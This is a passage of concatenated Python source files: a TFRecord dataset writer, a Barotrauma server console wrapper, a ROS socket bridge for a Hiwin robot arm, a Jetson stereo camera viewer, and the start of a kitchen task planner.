        # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
        shard = thread_index * num_shards_per_batch + s
        output_filename = '%s-%.5d-of-%.5d.tfrecords' % (name, shard, num_shards)
        output_file = os.path.join(output_directory, output_filename)
        writer = tf.python_io.TFRecordWriter(output_file)
        shard_counter = 0
        files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
        for i in files_in_shard:
            image_example = dataset[i]
            filename = str(image_example['filename'])
            try:
                if store_images:
                    if 'encoded' in image_example:
                        # Pre-encoded image bytes supplied by the caller.
                        image_buffer = image_example['encoded']
                        height = image_example['height']
                        width = image_example['width']
                        colorspace = image_example['colorspace']
                        image_format = image_example['format']
                        num_channels = image_example['channels']
                        example = _convert_to_example(image_example, image_buffer, height,
                                                      width, colorspace, num_channels,
                                                      image_format)
                    else:
                        # Read + (re-)encode from disk.
                        image_buffer, height, width = _process_image(filename, coder)
                        example = _convert_to_example(image_example, image_buffer, height,
                                                      width)
                else:
                    # Metadata-only record: no pixel data stored.
                    image_buffer = ''
                    height = int(image_example['height'])
                    width = int(image_example['width'])
                    example = _convert_to_example(image_example, image_buffer, height,
                                                  width)
                writer.write(example.SerializeToString())
                shard_counter += 1
                counter += 1
            except Exception as e:
                # BUG FIX: a stray `raise` here used to re-raise immediately,
                # making the error-collection code below unreachable and
                # killing the whole worker thread on the first bad image.
                error_counter += 1
                error_msg = repr(e)
                image_example['error_msg'] = error_msg
                error_queue.put(image_example)
            if not counter % 1000:
                print('%s [thread %d]: Processed %d of %d images in thread batch, with %d errors.' %
                      (datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
                sys.stdout.flush()
        # BUG FIX: close the shard writer so the file is flushed to disk.
        writer.close()
        print('%s [thread %d]: Wrote %d images to %s, with %d errors.' %
              (datetime.now(), thread_index, shard_counter, output_file, error_counter))
        sys.stdout.flush()
        shard_counter = 0
    print('%s [thread %d]: Wrote %d images to %d shards, with %d errors.' %
          (datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
    sys.stdout.flush()
def create(dataset, dataset_name, output_directory, num_shards, num_threads, shuffle=True, store_images=True):
    """Create the tfrecord files to be used to train or test a model.
    Args:
      dataset : [{
        "filename" : <REQUIRED: path to the image file>,
        "id" : <REQUIRED: id of the image>,
        "class" : {
          "label" : <[0, num_classes)>,
          "text" : <text description of class>
        },
        "object" : {
          "bbox" : {
            "xmin" : [],
            "xmax" : [],
            "ymin" : [],
            "ymax" : [],
            "label" : []
          }
        }
      }]
      dataset_name: a name for the dataset
      output_directory: path to a directory to write the tfrecord files
      num_shards: the number of tfrecord files to create
      num_threads: the number of threads to use
      shuffle : bool, should the image examples be shuffled or not prior to creating the tfrecords.
      store_images: bool, store the encoded image bytes in the records.
    Returns:
      list : a list of image examples that failed to process.
    """
    # Images in the tfrecords set must be shuffled properly
    if shuffle:
        random.shuffle(dataset)
    # Break all images into batches with a [ranges[i][0], ranges[i][1]].
    # BUG FIX: `np.int` was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin `int` is the documented replacement.
    spacing = np.linspace(0, len(dataset), num_threads + 1).astype(int)
    ranges = []
    for i in range(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i + 1]])
    # Launch a thread for each batch.
    print('Launching %d threads for spacings: %s' % (num_threads, ranges))
    sys.stdout.flush()
    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()
    # Create a generic TensorFlow-based utility for converting all image codings.
    coder = ImageCoder()
    # A Queue to hold the image examples that fail to process.
    error_queue = Queue()
    threads = []
    for thread_index in range(len(ranges)):
        args = (coder, thread_index, ranges, dataset_name, output_directory, dataset,
                num_shards, store_images, error_queue)
        t = threading.Thread(target=_process_image_files_batch, args=args)
        t.start()
        threads.append(t)
    # Wait for all the threads to terminate.
    coord.join(threads)
    print('%s: Finished writing all %d images in data set.' %
          (datetime.now(), len(dataset)))
    # Collect the errors
    errors = []
    while not error_queue.empty():
        errors.append(error_queue.get())
    print('%d examples failed.' % (len(errors),))
    return errors
def parse_args():
    """Parse the command-line options for building the tfrecord files."""
    parser = argparse.ArgumentParser(description='Basic statistics on tfrecord files')
    # Required value options: (flag, dest, type, help text).
    required_options = (
        ('--dataset_path', 'dataset_path', str, 'Path to the dataset json file.'),
        ('--prefix', 'dataset_name', str, 'Prefix for the tfrecords (e.g. `train`, `test`, `val`).'),
        ('--output_dir', 'output_dir', str, 'Directory for the tfrecords.'),
        ('--shards', 'num_shards', int, 'Number of shards to make.'),
        ('--threads', 'num_threads', int, 'Number of threads to make.'),
    )
    for flag, dest, value_type, help_text in required_options:
        parser.add_argument(flag, dest=dest, help=help_text, type=value_type,
                            required=True)
    # Optional boolean flags, off by default.
    flag_options = (
        ('--shuffle', 'shuffle', 'Shuffle the records before saving them.'),
        ('--store_images', 'store_images', 'Store the images in the tfrecords.'),
    )
    for flag, dest, help_text in flag_options:
        parser.add_argument(flag, dest=dest, help=help_text, required=False,
                            action='store_true', default=False)
    return parser.parse_args()
def main():
    """Entry point: load the dataset json and write the tfrecord shards.

    Returns the list of image examples that failed to process (see create()).
    """
    args = parse_args()
    # The dataset file is a json list of image example dicts.
    with open(args.dataset_path) as f:
        dataset = json.load(f)
    errors = create(
        dataset=dataset,
        dataset_name=args.dataset_name,
        output_directory=args.output_dir,
        num_shards=args.num_shards,
        num_threads=args.num_threads,
        shuffle=args.shuffle,
        store_images=args.store_images
    )
    return errors
if __name__ == '__main__':
    main()
|
__init__.py | import time
import socket
import sys
import os
from threading import Thread
class Barotrauma:
    """Controls a Barotrauma dedicated server through its console.

    Commands are written to the server's stdin pipe file; console output is
    streamed back over a unix-domain socket and collected line by line into
    a bounded buffer by a background thread.
    """
    def __init__(self, stdinpath, udspath, writetimeout=0.1, responsetime=0.1, buffersize=128):
        self.stdinpath = stdinpath        # path to the server's stdin pipe file
        self.udspath = udspath            # path to the unix-domain socket
        self.writetimeout = writetimeout  # pause between follow-up writes
        # BUG FIX: the responsetime argument used to be ignored (hard-coded
        # to 0.3); honor the caller's value.
        self.responsetime = responsetime
        self.udsbuffer = Udsbuffer(size=buffersize)
        self.__start_uds_thread()
    def __uds_thread(self):
        """Background reader: stream console output lines into the buffer."""
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            sock.connect(self.udspath)
        except Exception as error:
            raise Exception("Error connecting to unix domain socket: " + repr(error))
        while True:
            data = ""
            while True:  # Receive exactly one line of data
                # NOTE(review): decoding byte-by-byte breaks on multi-byte
                # UTF-8 characters; fine as long as the console output is ASCII.
                data = data + sock.recv(1).decode()
                if data.endswith("\n"):
                    break
            self.udsbuffer.add(data.strip("\n"))
    def __start_uds_thread(self):
        thread = Thread(target=self.__uds_thread)
        thread.start()
    def send_command(self, command, args=None, followup=None):
        """Write one console command (plus optional follow-up lines) to stdin.

        BUG FIX: arguments used to be glued straight onto the command
        ("ban" + "name" -> "banname"); everything is now space-joined.
        Mutable default arguments replaced with None sentinels.
        """
        args = list(args) if args else []
        followup = list(followup) if followup else []
        try:
            with open(self.stdinpath, "w") as file:
                file.write(" ".join([command] + args))
                for string in followup:
                    time.sleep(self.writetimeout)
                    file.write(string)
        except Exception as error:
            raise Exception("Error on writing to pipefile: " + repr(error))
    def response(self, command, args=None):
        """Send a command and return the console lines printed after its echo."""
        args = list(args) if args else []
        self.udsbuffer.flush()
        self.send_command(command, args)
        time.sleep(self.responsetime)  # give the server time to answer
        response = self.udsbuffer.buffer
        index = [i for i, s in enumerate(response) if command in s][0]  # locate the echoed command
        response = response[index + 1:]  # keep only the output after the echo
        return response
    def ban_name(self, name, reason, duration):
        self.send_command("ban", [name], [reason, duration])
    def ban_ip(self, ip, reason, duration):
        self.send_command("banip", [ip], [reason, duration])
    def get_players(self):
        """Parse `clientlist` output lines ("- id: name, ip") into Players."""
        responses = self.response("clientlist")
        responses = [i for i in responses if i.startswith("-")]
        clients = []
        for response in responses:
            response = response[2:]
            if response.find("playing") == -1:
                name = response[response.find(":") + 2:response.rfind(",")]
            else:
                name = response[response.find(":") + 2:response.find("playing") - 1]
            id = response[:response.find(":")]
            ip = response[response.rfind(",") + 2:].strip()
            clients.append(Player(self, name, id, ip))
        return clients
    def get_player_by_name(self, name):
        """Return the matching Player, or -1 if no such client is connected."""
        clients = self.get_players()
        for client in clients:
            if client.name.lower() == name.lower():
                return client
        return -1
    def get_player_by_ip(self, ip):
        """Return the matching Player, or -1 if no such client is connected."""
        clients = self.get_players()
        for client in clients:
            if client.ip == ip:
                # BUG FIX: used to return the ip string instead of the Player.
                return client
        return -1
    def get_player_by_id(self, id):
        """Return the matching Player, or -1. `id` must be a string."""
        clients = self.get_players()
        for client in clients:
            if client.id == id:
                return client
        return -1
class Udsbuffer:
    """Bounded FIFO buffer of console-output lines from the game server."""
    def __init__(self, size=128):
        self.buffer = []   # newest lines at the end
        self.size = size   # maximum number of retained lines
    def add(self, data):
        """Append one line; discard the OLDEST lines beyond `size`.

        Please use this function instead of appending to .buffer directly,
        as it enforces the size limit.
        BUG FIX: the original trimmed from the tail (`del buffer[size:]`),
        so once the buffer filled up every newly added line was thrown away
        and only stale data was kept.
        """
        self.buffer.append(data)
        if len(self.buffer) > self.size:
            del self.buffer[:len(self.buffer) - self.size]
    def flush(self):
        """Empty the buffer."""
        self.buffer.clear()
class Player:
    """A connected client, bound to the Barotrauma wrapper that produced it."""
    def __init__(self, barotrauma, name, id, ip):
        self.name = name
        self.id = id
        self.ip = ip
        self.barotrauma = barotrauma
    def ban_name(self, reason, duration):
        # BUG FIX: referenced the undefined global `barotrauma`.
        self.barotrauma.ban_name(self.name, reason, duration)
    def ban_ip(self, reason, duration):
        # BUG FIX: used to ban by name with the ip value; delegate to ban_ip.
        self.barotrauma.ban_ip(self.ip, reason, duration)
    def give_rank(self, rank):
        # BUG FIX: `give_rank` and the builtin `id` were unresolved names.
        # NOTE(review): confirm the exact console command string against the
        # server version ("giverank" assumed here).
        self.barotrauma.send_command("giverank", [self.id], [rank])
    def give_permission(self, permission):
        # BUG FIX: same unresolved-name problem as give_rank.
        # NOTE(review): confirm the command string ("giveperm" assumed).
        self.barotrauma.send_command("giveperm", [self.id], [permission])
|
HiwinRA605_socket_ros_test_20190625195259.py | #!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0'  # initial value of the payload forwarded over the socket
Arm_feedback = 1  # assume the arm is busy until told otherwise
state_feedback = 0  # last response from the 'arm_state' ROS service
NAME = 'socket_server'  # ROS node name
client_response = 0  # running count of pose replies (service response value)
point_data_flag = False  # set when a new pose arrives from the strategy side
arm_mode_flag = False  # set when a new arm mode arrives
speed_mode_flag = False  # set when a new speed mode arrives
##------------class pos-------
class point():
    """Cartesian pose: position (x, y, z) plus orientation (pitch, roll, yaw)."""
    def __init__(self, x, y, z, pitch, roll, yaw):
        self.x, self.y, self.z = x, y, z
        self.pitch, self.roll, self.yaw = pitch, roll, yaw
# Module-level pose cache, updated by the ROS service callbacks.
pos = point(0, 36.8, 11.35, -90, 0, 0)
##------------class socket_cmd---------
class socket_cmd():
    """Holder for the current arm command.

    NOTE(review): used throughout this module as a plain namespace — the
    service callbacks assign attributes on the CLASS object itself
    (socket_cmd.action = ...); no instance is ever created, so __init__
    appears to be dead code.
    """
    def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
        self.grip = grip        # gripper command
        self.setvel = setvel    # velocity setting
        self.ra = ra            # relative/absolute flag
        self.delay = delay      # delay time
        self.setboth = setboth  # position / euler / both control mode
        self.action = action    # action type (PtoP, Line, SetVel, ...)
        self.Speedmode = Speedmode  # fast vs. safe speed mode
##-----------switch define------------##
class switch(object):
    """One-shot switch/case helper (classic ActiveState recipe).

    Usage: `for case in switch(value):` then `if case(X): ...; break`.
    A successful match sets `fall` so later `case(...)` calls fall through,
    and a bare `case()` acts as the default branch.
    """
    def __init__(self, value):
        self.value = value
        self.fall = False
    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        # BUG FIX: `raise StopIteration` inside a generator is turned into
        # RuntimeError under PEP 479 (Python 3.7+), crashing any loop that
        # exhausts the iterator without breaking; a plain return ends it.
        return
    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args:
            self.fall = True
            return True
        else:
            return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
    """Forward the arm's busy/ready state to the ROS 'arm_state' service.

    Blocks until the service is available, then stores the service response
    in the module-global `state_feedback`.
    """
    global state_feedback
    rospy.wait_for_service('arm_state')
    try:
        Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
        state_feedback = Arm_state_client(Arm_state)
        #pos_feedback_times = pos_feedback.response
        return state_feedback
    except rospy.ServiceException as e:
        print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req):  ## receives the pose sent by the strategy side
    """ROS 'arm_pos' service callback: cache the requested pose in `pos`.

    NOTE(review): every field is stored as a *string* ('%s' % value); the
    TCP command builders appear to accept that — confirm.
    Returns the running reply count as the service response.
    """
    global client_response,point_data_flag
    pos.x = '%s'%req.x
    pos.y = '%s'%req.y
    pos.z = '%s'%req.z
    pos.pitch = '%s'%req.pitch
    pos.roll = '%s'%req.roll
    pos.yaw = '%s'%req.yaw
    point_data_flag = True  # signal the socket thread there is a new pose
    client_response = client_response + 1
    return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):  ## receives the arm-mode request from the strategy side
    """ROS 'arm_mode' service callback: cache action/grip/ra/vel/both flags.

    NOTE(review): values are assigned on the socket_cmd CLASS itself
    (shared namespace), not on an instance.
    """
    global arm_mode_flag
    socket_cmd.action = int('%s'%req.action)
    socket_cmd.grip = int('%s'%req.grip)
    socket_cmd.ra = int('%s'%req.ra)
    socket_cmd.setvel = int('%s'%req.vel)
    socket_cmd.setboth = int('%s'%req.both)
    arm_mode_flag = True  # signal the socket thread there is a new mode
    return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req):  ## receives the speed-mode request from the strategy side
    """ROS 'speed_mode' service callback: cache the fast/safe speed flag."""
    global speed_mode_flag
    socket_cmd.Speedmode = int('%s'%req.Speedmode)
    speed_mode_flag = True  # signal the socket thread
    return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server():  ## create the Server node
    """Register the ROS services exposed to the strategy side and spin.

    Services: 'arm_mode' (mode flags), 'arm_pos' (pose), 'speed_mode'
    (fast/safe). Blocks in rospy.spin() until the node shuts down.
    """
    rospy.init_node(NAME)
    a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
    s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
    b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
    #c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
    print ("Ready to connect")
    rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
    """Bridge loop: forward cached arm commands to the controller PC.

    Connects a TCP socket to the arm controller, and whenever one of the
    module flags signals fresh data from the ROS callbacks, builds the
    matching TCP command string, sends it, and reports the controller's
    busy/ready byte back through the 'arm_state' service.

    NOTE(review): the control-flow nesting below was reconstructed from a
    whitespace-stripped source — verify against the original file.
    """
    global Arm_feedback,data,point_data_flag,arm_mode_flag,speed_mode_flag
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
        #s.connect(('192.168.1.102', 8080))#iclab computerx
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    print('Connection has been successful')
    print(s.recv(1024))
    # Originally prompted the operator: press 1 to start, 3 to quit.
    #start_input=int(input('...'))
    start_input = 1
    if start_input==1:
        while 1:
            ##--------------- send arm commands over the socket -----------------
            #if Arm_feedback == 0:
            if point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True:
                # Consume the "new data" flags set by the ROS callbacks.
                point_data_flag = False
                arm_mode_flag = False
                speed_mode_flag = False
                #------- select the command mode --------
                for case in switch(socket_cmd.action):
                    #------- PtP mode --------
                    if case(Taskcmd.Action_Type.PtoP):
                        for case in switch(socket_cmd.setboth):
                            if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                                data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                                break
                            if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                                data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                                break
                            if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                                data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                                break
                        break
                    #------- Line mode --------
                    if case(Taskcmd.Action_Type.Line):
                        for case in switch(socket_cmd.setboth):
                            if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                                data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                                break
                            if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                                data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                                break
                            if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                                data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                                break
                        break
                    #------- set arm speed --------
                    if case(Taskcmd.Action_Type.SetVel):
                        data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
                        break
                    #------- set arm delay time --------
                    if case(Taskcmd.Action_Type.Delay):
                        data = TCP.SetDelay(socket_cmd.grip,0)
                        break
                    #------- set arm fast/safe mode --------
                    if case(Taskcmd.Action_Type.Mode):
                        data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
                        break
                socket_cmd.action= 5 ## reset back to the idle/initial mode
                s.send(data.encode('utf-8'))# send the command string to the controller
                Socket_sent_flag = True  # NOTE(review): local flag, never read
                feedback_str = s.recv(1024)
                # The controller answers with a status byte at index 2.
                if str(feedback_str[2]) == '70':# 70 == ord('F'): ready for the next motion command
                    Arm_feedback = 0
                    socket_client_arm_state(Arm_feedback)
                    #print("isbusy false")
                if str(feedback_str[2]) == '84':# 84 == ord('T'): busy, cannot take a command
                    Arm_feedback = 1
                    socket_client_arm_state(Arm_feedback)
                    #print("isbusy true")
                if str(feedback_str[2]) == '54':# 54 == ord('6'): strategy finished
                    Arm_feedback = 6
                    socket_client_arm_state(Arm_feedback)
                    print("shutdown")
            ##--------------- end of command sending -----------------
            if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
                rospy.on_shutdown(myhook)
                break
    if start_input == 3:
        pass
    s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
    """Thread entry point: run the socket-client bridge loop."""
    socket_client()
## 多執行序 end
def myhook():
    """rospy shutdown hook: log that the node is going down."""
    print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5  # reset to the idle/initial mode
    # Run the socket client on a worker thread while the ROS services spin
    # on the main thread.
    t = threading.Thread(target=thread_test)
    t.start()
    socket_server()
    t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line |
stereo_camera.py | # MIT License
# Copyright (c) 2019,2020 JetsonHacks
# See license
# A very simple code snippet
# Using two CSI cameras (such as the Raspberry Pi Version 2) connected to a
# NVIDIA Jetson Nano Developer Kit (Rev B01) using OpenCV
# Drivers for the camera and OpenCV are included in the base image in JetPack 4.3+
# This script will open a window and place the camera stream from each camera in a window
# arranged horizontally.
# The camera streams are each read in their own thread, as when done sequentially there
# is a noticeable lag
# For better performance, the next step would be to experiment with having the window display
# in a separate thread
import cv2
import threading
import numpy as np
# gstreamer_pipeline returns a GStreamer pipeline for capturing from the CSI camera
# Flip the image by setting the flip_method (most common values: 0 and 2)
# display_width and display_height determine the size of each camera pane in the window on the screen
class CSI_Camera:
    """Reads frames from a CSI camera on a background thread.

    open() creates the OpenCV/GStreamer capture and grabs one frame;
    start() spawns the reader thread; read() returns the latest frame
    under a lock; stop()/release() shut everything down.
    """
    def __init__(self):
        # OpenCV video capture element (None until open() succeeds)
        self.video_capture = None
        # The last captured image from the camera
        self.frame = None
        self.grabbed = False
        # The thread where the video capture runs
        self.read_thread = None
        self.read_lock = threading.Lock()
        self.running = False

    def open(self, gstreamer_pipeline_string):
        """Open the capture from a GStreamer pipeline string."""
        try:
            self.video_capture = cv2.VideoCapture(
                gstreamer_pipeline_string, cv2.CAP_GSTREAMER
            )
        except RuntimeError:
            self.video_capture = None
            print("Unable to open camera")
            print("Pipeline: " + gstreamer_pipeline_string)
            return
        # Grab the first frame to start the video capturing
        self.grabbed, self.frame = self.video_capture.read()

    def start(self):
        """Start the background reader thread; returns self (or None if already running)."""
        if self.running:
            print('Video capturing is already running')
            return None
        if self.video_capture is not None:
            self.running = True
            self.read_thread = threading.Thread(target=self.updateCamera)
            self.read_thread.start()
        return self

    def stop(self):
        """Stop the reader thread and wait for it to finish."""
        self.running = False
        # BUG FIX: guard against stop() being called before start().
        if self.read_thread is not None:
            self.read_thread.join()
            self.read_thread = None

    def updateCamera(self):
        # This is the thread that reads images from the camera.
        while self.running:
            try:
                grabbed, frame = self.video_capture.read()
                with self.read_lock:
                    self.grabbed = grabbed
                    self.frame = frame
            except RuntimeError:
                print("Could not read image from camera")
                # NOTE(review): the loop keeps running after a failed read;
                # consider stopping and cleaning up instead.

    def read(self):
        """Return (grabbed, frame-copy) of the most recent capture."""
        with self.read_lock:
            # BUG FIX: previously raised AttributeError when no frame had
            # been captured yet (open() failed or never called).
            frame = self.frame.copy() if self.frame is not None else None
            grabbed = self.grabbed
        return grabbed, frame

    def release(self):
        """Stop the reader thread, then release the capture device.

        BUG FIX: the original released the capture first and then joined a
        thread that was still running (and still reading from the released
        capture), which could hang or error.
        """
        if self.running:
            self.stop()
        elif self.read_thread is not None:
            self.read_thread.join()
            self.read_thread = None
        if self.video_capture is not None:
            self.video_capture.release()
            self.video_capture = None
# Currently there are setting frame rate on CSI Camera on Nano through gstreamer
# Here we directly select sensor_mode 3 (1280x720, 59.9999 fps)
def gstreamer_pipeline(
    sensor_id=0,
    sensor_mode=3,
    capture_width=1280,
    capture_height=720,
    display_width=1280,
    display_height=720,
    framerate=30,
    flip_method=0,
):
    """Build the GStreamer pipeline string for an nvarguscamerasrc CSI camera.

    The pipeline captures NV12 frames at capture_width x capture_height,
    flips them with nvvidconv, scales to display_width x display_height,
    and delivers BGR frames to an appsink for OpenCV.
    """
    # Camera source: raw NV12 frames in NVMM memory at the capture size.
    source = (
        "nvarguscamerasrc sensor-id=%d sensor-mode=%d ! "
        "video/x-raw(memory:NVMM), "
        "width=(int)%d, height=(int)%d, "
        "format=(string)NV12, framerate=(fraction)%d/1 ! "
    ) % (sensor_id, sensor_mode, capture_width, capture_height, framerate)
    # Flip/scale, then convert to plain BGR for the OpenCV appsink.
    tail = (
        "nvvidconv flip-method=%d ! "
        "video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! "
        "videoconvert ! "
        "video/x-raw, format=(string)BGR ! appsink"
    ) % (flip_method, display_width, display_height)
    return source + tail
class stereo_camera():
    """Owns a left/right CSI_Camera pair and shows their streams side by side."""
    def __init__(self):
        # Left camera: CSI sensor 0, 960x540 display pane.
        left_camera = CSI_Camera()
        left_camera.open(
            gstreamer_pipeline(
                sensor_id=0,
                sensor_mode=3,
                flip_method=0,
                display_height=540,
                display_width=960,
            )
        )
        left_camera.start()
        # Right camera: CSI sensor 1, same settings.
        right_camera = CSI_Camera()
        right_camera.open(
            gstreamer_pipeline(
                sensor_id=1,
                sensor_mode=3,
                flip_method=0,
                display_height=540,
                display_width=960,
            )
        )
        right_camera.start()
        print(left_camera.video_capture.isOpened())
        print(right_camera.video_capture.isOpened())
        cv2.namedWindow("CSI Cameras", cv2.WINDOW_AUTOSIZE)
        if (
            not left_camera.video_capture.isOpened()
            or not right_camera.video_capture.isOpened()
        ):
            # Cameras did not open, or no camera attached
            print("Unable to open any cameras")
            # TODO: Proper Cleanup
            # NOTE(review): SystemExit(0) only CONSTRUCTS the exception; it
            # is never raised, so execution continues even on failure.
            SystemExit(0)
        self.left_camera = left_camera
        self.right_camera = right_camera
    def run_stereo_camera(self):
        """Show both streams side by side until ESC or the window closes."""
        while cv2.getWindowProperty("CSI Cameras", 0) >= 0 :
            _ , left_image = self.left_camera.read()
            _ , right_image = self.right_camera.read()
            camera_images = np.hstack((left_image, right_image))
            cv2.imshow("CSI Cameras", camera_images)
            # waitKey also pumps the GUI event loop.
            keyCode = cv2.waitKey(30) & 0xFF
            # Stop the program on the ESC key
            if keyCode == 27:
                break
    def stop_stereo_camera(self):
        """Stop both reader threads, release the captures, close the window."""
        self.left_camera.stop()
        self.left_camera.release()
        self.right_camera.stop()
        self.right_camera.release()
        cv2.destroyAllWindows()
if __name__ == "__main__":
    # Open both cameras, run the viewer loop, then clean up.
    cams = stereo_camera()
    cams.run_stereo_camera()
    cams.stop_stereo_camera()
|
KitchenPlanner.py | # Copyright 2015 Ciara Kamahele-Sanfratello
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Planner import Planner
from Primitives.KitchenPrimitives import KitchenState, KitchenAction
import subprocess, threading, time, Queue
class KitchenPlanner(Planner):
    """Drives an external planner binary for the kitchen manipulation domain.

    The problem is serialized to <path>/temp.txt, the binary is run in a
    subprocess with a wall-clock timeout, and its stdout is parsed into a
    list of KitchenAction objects. (Python 2 code: Queue module, print
    statements.)
    """
    def __init__(self):
        # Absolute path to the directory holding the planner binary (`main`)
        # and the temp problem file. NOTE(review): machine-specific path.
        self.path = '/Users/ciara/Dropbox/Ciara/LIS/planner'
        # Most recent parsed plan: list of KitchenAction, or None.
        self.plan = None
    def write_input_file(self, initial_state, goal_state):
        """Serialize the initial and goal KitchenState to temp.txt.

        Format: one number per line — problem sizes and probabilities
        first, then the initial-state vectors, then the goal vectors.
        """
        f = open(self.path + '/temp.txt', 'w')
        f.write('%d\n' % initial_state.numLocs)
        f.write('%d\n' % initial_state.numObjs)
        f.write('%.2f\n' % initial_state.move_prob)
        f.write('%.2f\n' % initial_state.pick_prob)
        f.write('%.2f\n' % initial_state.place_prob)
        f.write('%.2f\n' % initial_state.look_obs)
        for x in initial_state.robotLoc:
            f.write('%.2f\n' % x)
        for x in initial_state.heldObj:
            f.write('%.2f\n' % x)
        for locs in initial_state.objLocs:
            for x in locs:
                f.write('%.2f\n' % x)
        for x in initial_state.freeLocs:
            f.write('%.2f\n' % x)
        for x in goal_state.robotLoc:
            f.write('%.2f\n' % x)
        for x in goal_state.heldObj:
            f.write('%.2f\n' % x)
        for locs in goal_state.objLocs:
            for x in locs:
                f.write('%.2f\n' % x)
        for x in goal_state.freeLocs:
            f.write('%.2f\n' % x)
        f.close()
    def run_cmd(self, timeout, weight):
        """Run the planner with heuristic weight `weight` and a timeout.

        Runs the subprocess on a helper thread so the join can time out;
        on timeout the process is terminated and False is returned.  On
        success the stdout is parsed into self.plan and True is returned.
        """
        q = Queue.Queue()
        def target(q):
            # The serialized problem is fed to the binary on stdin.
            input_file = open('%s/temp.txt' % self.path)
            #print 'waiting to replan'
            #raw_input()
            #print 'replanning with w=%.2f' % weight
            self.process = subprocess.Popen(['%s/main' % self.path,
                                             '--file=true',
                                             '--problem=kitchen',
                                             '--weight=' + str(weight),
                                             '--epsilon=0.0'],
                                            stdin=input_file,
                                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            out, err = self.process.communicate()
            q.put(out)
        thread = threading.Thread(target=target, args=[q])
        start_time = time.time()
        thread.start()
        thread.join(timeout)
        if thread.is_alive():
            # Timed out: kill the planner and report failure.
            self.process.terminate()
            thread.join()
            print "killed"
            return False
        else:
            #print 'elapsed time: %.2f' % (time.time() - start_time)
            self.parse_plan(q.get())
            return True
    def parse_plan(self, out):
        """Parse planner stdout into self.plan (a list of KitchenAction).

        Dispatches on the line prefix (move/pick/place/look_*) and decodes
        the underscore-separated integer arguments after it.
        """
        try:
            plan = out.split('\n')
            self.plan = []
            for i in range(len(plan)):
                if plan[i][0:4] == 'move':
